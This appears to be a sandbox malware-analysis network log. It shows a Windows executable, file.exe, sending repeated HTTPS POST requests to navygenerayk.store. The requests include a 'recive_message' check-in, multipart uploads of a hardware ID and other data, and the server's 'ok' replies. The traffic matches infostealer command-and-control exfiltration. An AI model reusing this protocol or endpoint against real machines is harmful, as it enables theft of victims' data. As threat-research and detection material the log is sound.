2024-11-08 14:20:37 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: navygenerayk.store
2024-11-08 14:20:37 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-11-08 14:20:38 UTC	1011	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i6s8igjlbfhrjpe1gb60cce00o; expires=Tue, 04-Mar-2025 08:07:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uFZL%2FvnlQeKwsA4uwaJKoHRutpIsJhwX%2FugISPyI4x8GmGCvnka0aQemn8gVtBtKK7UbEYMVuUJda1IO5IuFfFM5cCycEnmFVAPqCs1DuWkFjPkcQzNBqhLOB8zhUs4ETXeVigI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df6346f384628e6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=954&delivery_rate=2074498&cwnd=251&unsent_bytes=0&cid=f34003e79b8be609&ts=527&x=0"
2024-11-08 14:20:38 UTC	358	IN	Data Raw: 32 64 63 66 0d 0a 55 43 50 4c 69 7a 70 4b 47 4c 46 2b 73 77 68 39 30 33 31 77 73 46 6c 5a 38 6d 62 4f 51 6d 41 6f 6a 69 74 6f 7a 36 30 57 51 75 41 72 41 62 32 70 41 48 34 30 6b 77 33 57 4b 6b 65 6e 44 77 58 56 64 58 75 54 41 75 78 34 42 6b 6e 69 57 41 33 6a 6a 32 41 76 77 6d 70 46 71 75 64 4a 4c 7a 53 54 47 38 73 71 52 34 67 47 55 74 55 33 65 38 68 45 71 79 67 43 53 65 4a 4a 43 61 54 43 5a 69 36 44 4f 45 2b 73 34 31 38 70 66 4e 41 53 33 6d 30 59 74 68 77 61 33 6a 41 30 6d 67 76 73 62 6b 4a 4e 39 41 6c 53 37 65 42 7a 4e 6f 45 64 51 72 6a 67 47 44 63 30 79 6c 7a 57 5a 6c 2f 70 58 78 48 56 4f 7a 57 55 41 71 55 71 43 45 44 71 53 41 79 6c 33 58 38 6b 69 44 68 42 72 2b 4a 56 49 47 6a 64 47 4e 6c 6d 48 72 77 63 55 70 78 37 50 49 68 45 39 47 42 52 65 4f 39 59 47 Data Ascii: 2dcfUCPLizpKGLF+swh9031wsFlZ8mbOQmAojitoz60WQuArAb2pAH40kw3WKkenDwXVdXuTAux4BkniWA3jj2AvwmpFqudJLzSTG8sqR4gGUtU3e8hEqygCSeJJCaTCZi6DOE+s418pfNAS3m0Ythwa3jA0mgvsbkJN9AlS7eBzNoEdQrjgGDc0ylzWZl/pXxHVOzWUAqUqCEDqSAyl3X8kiDhBr+JVIGjdGNlmHrwcUpx7PIhE9GBReO9YG
2024-11-08 14:20:38 UTC	1369	IN	Data Raw: 46 4e 70 68 47 71 4d 55 47 39 38 32 4f 35 30 4f 6f 79 4d 43 54 65 5a 44 42 61 66 4c 65 53 32 45 4d 6b 48 70 70 78 67 76 59 70 4e 45 6b 55 6b 61 6f 52 67 65 78 48 6b 42 30 42 76 69 4f 55 4a 4e 34 41 6c 53 37 63 64 78 49 34 45 35 54 71 72 68 55 7a 70 36 77 52 72 63 62 77 32 33 47 68 7a 59 4f 43 6d 61 43 71 6f 6a 43 30 48 6c 54 41 32 70 6a 7a 70 67 68 53 6f 42 38 61 6c 35 4a 58 48 66 46 73 5a 71 58 36 35 52 43 35 49 38 4e 39 42 63 37 43 51 44 54 75 31 4e 42 4b 50 4c 65 43 61 4d 50 30 36 76 34 31 67 76 63 4e 73 55 30 47 63 55 76 68 38 58 33 7a 38 39 6e 41 57 70 59 45 77 4b 36 31 46 4b 39 59 39 61 4a 34 45 67 41 35 7a 71 56 69 5a 39 78 56 7a 4f 4a 41 62 78 47 42 36 53 59 33 75 65 41 61 4d 79 41 31 6a 70 52 78 69 68 79 6e 49 74 67 54 78 42 72 4f 35 56 4a 6e 7a Data Ascii: FNphGqMUG982O50OoyMCTeZDBafLeS2EMkHppxgvYpNEkUkaoRgexHkB0BviOUJN4AlS7cdxI4E5TqrhUzp6wRrcbw23GhzYOCmaCqojC0HlTA2pjzpghSoB8al5JXHfFsZqX65RC5I8N9Bc7CQDTu1NBKPLeCaMP06v41gvcNsU0GcUvh8X3z89nAWpYEwK61FK9Y9aJ4EgA5zqViZ9xVzOJAbxGB6SY3ueAaMyA1jpRxihynItgTxBrO5VJnz
2024-11-08 14:20:38 UTC	1369	IN	Data Raw: 41 62 78 47 42 36 53 59 33 75 63 44 61 77 72 43 45 37 73 54 67 65 6f 7a 48 4d 6a 6a 7a 56 4c 70 2b 35 63 4a 48 50 65 47 74 46 74 47 37 51 4e 46 39 73 33 4e 39 42 4b 37 43 63 61 43 72 51 4a 4a 61 72 5a 64 77 2b 42 49 30 6a 70 39 68 59 78 4f 74 51 51 6b 54 4a 66 74 68 6f 61 32 54 30 7a 6b 42 61 70 4c 67 6c 4c 35 6b 38 4c 6f 4d 4e 79 49 49 4d 79 52 36 58 70 58 79 39 6f 77 52 6e 58 65 42 58 78 55 56 4c 56 49 33 76 49 52 4a 6f 77 46 56 76 36 43 7a 2b 75 77 58 6f 6e 6c 48 4a 65 35 2f 41 59 4c 33 61 54 52 4a 46 68 48 37 30 59 47 74 51 2f 4d 35 38 4c 70 54 49 44 52 75 4a 62 44 61 33 47 65 69 2b 4f 4f 30 79 75 35 46 4d 69 64 39 63 62 30 43 70 52 38 52 67 4b 6b 6d 4e 37 70 68 53 68 4c 43 78 42 34 45 42 4b 73 6f 46 74 59 49 55 2b 41 66 47 70 58 43 52 79 32 52 50 59 Data Ascii: AbxGB6SY3ucDawrCE7sTgeozHMjjzVLp+5cJHPeGtFtG7QNF9s3N9BK7CcaCrQJJarZdw+BI0jp9hYxOtQQkTJfthoa2T0zkBapLglL5k8LoMNyIIMyR6XpXy9owRnXeBXxUVLVI3vIRJowFVv6Cz+uwXonlHJe5/AYL3aTRJFhH70YGtQ/M58LpTIDRuJbDa3Gei+OO0yu5FMid9cb0CpR8RgKkmN7phShLCxB4EBKsoFtYIU+AfGpXCRy2RPY
2024-11-08 14:20:38 UTC	1369	IN	Data Raw: 67 57 31 44 52 37 33 6b 53 72 4f 45 49 53 72 47 59 74 6d 49 31 56 47 73 49 74 44 37 43 70 58 79 51 36 69 31 7a 64 61 52 4f 35 45 42 54 62 4e 7a 47 5a 44 36 41 72 42 6b 62 6c 54 41 79 73 79 6e 45 68 68 6a 35 4c 72 2b 70 62 4a 33 58 63 46 4a 45 6b 58 37 59 48 55 6f 70 37 48 6f 63 50 6f 69 5a 43 56 61 4a 51 53 71 72 44 4e 48 6a 43 50 6b 69 76 37 31 30 6b 65 39 55 55 31 47 49 62 73 42 6b 55 30 54 51 2f 6c 51 57 6a 4a 41 35 45 35 6b 67 4c 6f 63 52 37 4b 34 64 79 44 2b 6e 75 51 47 67 69 6b 79 33 53 66 41 69 68 45 31 4c 4e 64 53 4c 51 41 36 42 67 57 67 72 74 57 77 43 6e 77 58 45 76 68 7a 46 4f 72 75 52 65 4a 48 44 61 46 4e 64 6c 46 71 4d 63 48 74 77 38 4e 5a 77 4b 6f 53 6f 42 52 36 77 48 53 71 72 58 4e 48 6a 43 48 6b 61 6b 78 31 4d 6b 66 5a 4d 44 6e 33 4e 66 74 Data Ascii: gW1DR73kSrOEISrGYtmI1VGsItD7CpXyQ6i1zdaRO5EBTbNzGZD6ArBkblTAysynEhhj5Lr+pbJ3XcFJEkX7YHUop7HocPoiZCVaJQSqrDNHjCPkiv710ke9UU1GIbsBkU0TQ/lQWjJA5E5kgLocR7K4dyD+nuQGgiky3SfAihE1LNdSLQA6BgWgrtWwCnwXEvhzFOruReJHDaFNdlFqMcHtw8NZwKoSoBR6wHSqrXNHjCHkakx1MkfZMDn3Nft
2024-11-08 14:20:38 UTC	1369	IN	Data Raw: 37 59 39 41 79 71 7a 41 53 53 61 35 34 48 4b 37 5a 66 79 32 4f 63 6c 37 6e 38 42 67 76 64 70 4e 45 6b 57 77 51 75 42 77 64 30 7a 49 33 6e 51 47 6c 4a 51 4e 4d 36 45 4d 41 72 63 6c 79 49 59 63 34 51 71 6a 6a 55 53 39 79 31 42 2f 44 4b 6c 48 78 47 41 71 53 59 33 75 35 41 37 34 75 45 67 72 7a 42 78 50 74 79 48 68 67 32 6e 4a 46 6f 2b 5a 63 4c 33 62 56 47 64 64 6e 48 72 34 65 45 74 30 2f 4d 4a 6b 43 72 53 30 48 52 2b 68 62 41 4b 62 41 65 43 6d 4f 50 77 48 6e 71 56 38 77 4f 6f 74 63 34 47 63 52 76 78 67 45 6b 69 52 31 69 55 53 72 4c 45 49 53 72 45 67 47 6f 73 78 37 49 34 45 7a 53 37 76 37 56 43 46 79 31 68 44 61 5a 42 6d 6a 47 52 33 62 4f 44 69 5a 41 36 51 73 43 45 6e 72 43 55 54 74 79 47 78 67 32 6e 4a 69 76 76 6c 56 61 47 57 64 42 5a 46 74 45 2f 46 48 55 74 Data Ascii: 7Y9AyqzASSa54HK7Zfy2Ocl7n8BgvdpNEkWwQuBwd0zI3nQGlJQNM6EMArclyIYc4QqjjUS9y1B/DKlHxGAqSY3u5A74uEgrzBxPtyHhg2nJFo+ZcL3bVGddnHr4eEt0/MJkCrS0HR+hbAKbAeCmOPwHnqV8wOotc4GcRvxgEkiR1iUSrLEISrEgGosx7I4EzS7v7VCFy1hDaZBmjGR3bODiZA6QsCEnrCUTtyGxg2nJivvlVaGWdBZFtE/FHUt
2024-11-08 14:20:38 UTC	1369	IN	Data Raw: 43 36 4d 70 43 30 37 6b 53 67 71 70 79 33 4d 6c 67 54 35 4b 72 75 70 58 4c 48 50 64 46 64 34 71 55 66 45 59 43 70 4a 6a 65 37 45 66 72 79 77 50 43 76 4d 48 45 2b 33 49 65 47 44 61 63 6b 32 6e 37 46 67 69 66 4e 63 5a 31 32 41 61 73 52 51 52 33 54 38 39 6c 41 75 73 4b 77 74 4c 36 6b 77 41 70 73 6c 35 49 34 51 30 41 65 65 70 58 7a 41 36 69 31 7a 78 63 52 4b 39 47 46 4c 4e 64 53 4c 51 41 36 42 67 57 67 72 6e 52 51 36 71 7a 33 6b 6a 69 6a 64 46 6f 2b 78 59 49 47 6a 62 48 4e 5a 34 44 62 45 57 46 39 34 34 4f 35 51 43 70 53 59 42 54 71 77 48 53 71 72 58 4e 48 6a 43 48 30 32 75 77 46 38 7a 4f 73 78 53 79 43 6f 59 76 56 39 4b 6b 6a 6f 77 6d 67 75 68 49 77 52 4a 35 30 77 41 72 4d 68 38 4c 5a 41 78 54 71 62 74 57 43 64 38 31 52 33 65 62 42 69 34 48 68 72 56 65 33 58 Data Ascii: C6MpC07kSgqpy3MlgT5KrupXLHPdFd4qUfEYCpJje7EfrywPCvMHE+3IeGDack2n7FgifNcZ12AasRQR3T89lAusKwtL6kwApsl5I4Q0AeepXzA6i1zxcRK9GFLNdSLQA6BgWgrnRQ6qz3kjijdFo+xYIGjbHNZ4DbEWF944O5QCpSYBTqwHSqrXNHjCH02uwF8zOsxSyCoYvV9KkjowmguhIwRJ50wArMh8LZAxTqbtWCd81R3ebBi4HhrVe3X
2024-11-08 14:20:38 UTC	1369	IN	Data Raw: 67 68 4e 2f 45 34 64 6f 6f 38 36 59 49 31 79 47 5a 43 70 55 53 39 68 77 67 72 63 65 68 6a 78 49 46 79 53 49 33 76 49 52 4a 6b 6a 44 45 54 72 58 78 76 67 36 47 49 71 68 53 4a 47 76 75 59 59 5a 6a 72 56 58 49 6b 35 55 66 45 62 41 35 4a 6a 61 38 4a 66 2b 58 4e 56 47 72 35 57 52 4c 53 50 59 6d 44 61 59 41 2f 70 2b 78 68 77 4f 70 51 66 77 33 67 5a 73 67 6b 52 6c 51 55 46 74 78 36 68 4a 68 56 62 30 6e 63 4e 74 38 4a 79 4e 35 4e 2b 56 4b 72 6e 56 69 39 73 6b 31 4b 52 5a 56 2f 70 4a 6c 4b 61 65 77 54 65 52 4c 52 67 57 67 72 5a 53 67 53 6a 79 47 49 78 7a 78 56 62 70 4f 39 50 4f 54 71 64 58 4e 63 71 52 2b 46 52 55 74 59 71 65 38 68 55 2f 6e 74 58 47 62 73 5a 57 4c 4b 42 62 57 43 55 63 68 6e 37 70 78 67 36 4f 6f 74 63 6c 6d 6b 4e 6f 78 6b 52 78 44 68 38 72 6a 71 43 Data Ascii: ghN/E4doo86YI1yGZCpUS9hwgrcehjxIFySI3vIRJkjDETrXxvg6GIqhSJGvuYYZjrVXIk5UfEbA5Jja8Jf+XNVGr5WRLSPYmDaYA/p+xhwOpQfw3gZsgkRlQUFtx6hJhVb0ncNt8JyN5N+VKrnVi9sk1KRZV/pJlKaewTeRLRgWgrZSgSjyGIxzxVbpO9POTqdXNcqR+FRUtYqe8hU/ntXGbsZWLKBbWCUchn7pxg6OotclmkNoxkRxDh8rjqC
2024-11-08 14:20:38 UTC	1369	IN	Data Raw: 39 48 42 4b 72 5a 5a 57 32 6c 50 45 61 6f 2f 30 67 2f 64 5a 4e 53 6b 57 78 66 36 55 31 63 6b 6a 38 71 30 46 7a 38 63 6c 6b 66 76 78 35 61 2f 39 41 36 4f 63 49 6b 41 66 47 37 46 6d 68 6f 6b 30 53 52 4c 52 79 6a 44 52 54 52 4c 54 6a 58 4f 70 49 48 44 45 33 74 58 78 71 36 77 44 73 4f 74 42 4e 2f 6c 2f 78 62 4a 6e 54 55 43 73 41 71 55 66 45 51 55 6f 6f 43 65 39 68 45 6b 32 35 43 55 71 77 52 53 70 6a 4d 65 69 36 46 4a 46 44 6b 7a 6c 59 76 65 38 55 4d 78 6d 56 51 6e 79 6b 7a 6b 6e 56 37 6c 6b 54 30 63 6b 77 4b 36 46 68 4b 39 5a 38 6d 65 39 64 68 46 76 6d 37 52 32 5a 6a 6b 77 71 52 4d 6b 33 2f 58 77 43 53 59 33 76 58 42 37 34 79 42 45 6e 36 53 6b 32 54 38 56 4d 75 68 54 4e 58 75 65 52 55 43 58 6e 43 46 75 39 55 43 72 49 52 48 4e 55 74 4b 74 42 4b 37 43 39 43 45 Data Ascii: 9HBKrZZW2lPEao/0g/dZNSkWxf6U1ckj8q0Fz8clkfvx5a/9A6OcIkAfG7Fmhok0SRLRyjDRTRLTjXOpIHDE3tXxq6wDsOtBN/l/xbJnTUCsAqUfEQUooCe9hEk25CUqwRSpjMei6FJFDkzlYve8UMxmVQnykzknV7lkT0ckwK6FhK9Z8me9dhFvm7R2ZjkwqRMk3/XwCSY3vXB74yBEn6Sk2T8VMuhTNXueRUCXnCFu9UCrIRHNUtKtBK7C9CE
2024-11-08 14:20:38 UTC	1369	IN	Data Raw: 75 33 33 4d 65 76 42 39 54 72 76 6c 62 61 6c 62 55 45 64 31 55 49 59 59 4f 46 63 4a 35 48 5a 4d 53 72 32 42 4d 43 76 51 4a 55 75 33 69 5a 69 65 53 4d 51 4f 46 37 6c 55 6b 4f 73 78 53 79 43 6f 4a 38 55 64 42 6e 48 73 70 30 46 7a 73 5a 77 46 59 2f 6b 38 4a 75 38 77 7a 48 72 77 66 55 36 37 35 57 32 70 4c 33 68 6a 48 66 78 79 68 47 43 7a 73 46 69 6d 58 46 4b 39 69 4a 33 43 75 65 42 79 75 7a 33 6f 6e 77 6e 77 42 73 61 6b 41 61 46 66 42 47 38 46 70 58 5a 51 6c 55 4f 4d 74 4f 4a 41 4b 71 32 41 64 42 50 55 4a 48 4f 32 58 4a 32 37 43 49 41 48 78 71 52 38 6d 64 39 49 66 33 32 6b 4e 6f 78 6b 52 78 44 68 38 72 6a 71 44 4b 77 4e 61 34 56 67 48 71 64 6c 4b 48 71 55 30 52 4b 37 58 5a 68 39 72 31 41 79 54 54 42 79 6e 48 46 4b 63 65 79 50 51 58 4f 77 48 42 45 2f 72 43 55 Data Ascii: u33MevB9TrvlbalbUEd1UIYYOFcJ5HZMSr2BMCvQJUu3iZieSMQOF7lUkOsxSyCoJ8UdBnHsp0FzsZwFY/k8Ju8wzHrwfU675W2pL3hjHfxyhGCzsFimXFK9iJ3CueByuz3onwnwBsakAaFfBG8FpXZQlUOMtOJAKq2AdBPUJHO2XJ27CIAHxqR8md9If32kNoxkRxDh8rjqDKwNa4VgHqdlKHqU0RK7XZh9r1AyTTBynHFKceyPQXOwHBE/rCU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49741	188.114.97.3	443	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 14:20:38 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12850 Host: navygenerayk.store
2024-11-08 14:20:38 UTC	12850	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 46 44 34 44 39 44 41 32 37 30 46 32 41 31 32 43 31 31 34 37 37 38 46 46 34 38 30 44 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"ECFD4D9DA270F2A12C114778FF480D6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-08 14:20:39 UTC	1012	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1ptbn9mj90vin0d2omqjkpceok; expires=Tue, 04-Mar-2025 08:07:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZjOwEqbTsw%2F6HOVWtyySSHpfSBqWbkE0y51CYkyUA38YkO4vNUs7ZXmGpXpP7sTWsj7L53qNi4potwT8Y41V8L5SArFiqC0TFe3LkhSAg73xDlnCVOL4GgHU6Q0n0Knwof2zmu0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df63477bae34787-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1200&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13792&delivery_rate=2251944&cwnd=251&unsent_bytes=0&cid=01a108343b3c0ae9&ts=862&x=0"
2024-11-08 14:20:39 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 14:20:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.9	49750	188.114.97.3	443	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 14:20:40 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15068 Host: navygenerayk.store
2024-11-08 14:20:40 UTC	15068	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 46 44 34 44 39 44 41 32 37 30 46 32 41 31 32 43 31 31 34 37 37 38 46 46 34 38 30 44 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"ECFD4D9DA270F2A12C114778FF480D6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-08 14:20:41 UTC	1022	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hdeg1u420uak253ckq1haro6on; expires=Tue, 04-Mar-2025 08:07:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qhmLceb87HG16FCyaBG%2FdsvPz5Rvulg7lcVRW2m0SJA%2FRSCNMW8aSl2%2FuRdSF%2BvxJsbIgmBWRh6Yk9dyvK8BeXhMhRrS%2BK8VzD7gDTSvnD%2BeXGfnJR2bmU0ZAyTCPLmDkPWFu30%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df634822cda6b28-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1105&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2845&recv_bytes=16010&delivery_rate=2473099&cwnd=251&unsent_bytes=0&cid=77563a8afc0bce7b&ts=633&x=0"
2024-11-08 14:20:41 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 14:20:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.9	49762	188.114.97.3	443	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 14:20:42 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20584 Host: navygenerayk.store
2024-11-08 14:20:42 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 43 46 44 34 44 39 44 41 32 37 30 46 32 41 31 32 43 31 31 34 37 37 38 46 46 34 38 30 44 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"ECFD4D9DA270F2A12C114778FF480D6B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-08 14:20:42 UTC	5253	OUT	Data Raw: 42 2d 3f 59 1d 59 90 6a 24 94 cb a5 d1 7c a5 91 90 6c b4 51 98 a9 b7 4a 24 6e 49 6e c9 56 ca e5 5a 2b a1 3f 3a 9e b9 75 bf a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: B-?YYj$\|lQJ$nInVZ+?:us}Q0u?4E([:s~
2024-11-08 14:20:43 UTC	1019	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 14:20:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t6r8r5akrp01nve7mip3ko9kpl; expires=Tue, 04-Mar-2025 08:07:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V8ikOPxbJE8HHE%2BKeEyGdjvPOctt%2FdwSD0eoerCjR9HiIfcZmNJFDaDb%2FCXRTWDzptsz7S5v5FUKxOrNgkEtH92lsEvfDpjBHq2DtGbN7kFVWVaO4oYWycu29%2FHd9WkmAKYsC78%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df6348f9f3e8d29-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1135&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21548&delivery_rate=2737240&cwnd=251&unsent_bytes=0&cid=d092138df727b627&ts=674&x=0"
2024-11-08 14:20:43 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 30 0d 0a Data Ascii: 11ok 173.254.250.90
2024-11-08 14:20:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.9	49771	188.114.97.3	443	7508	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
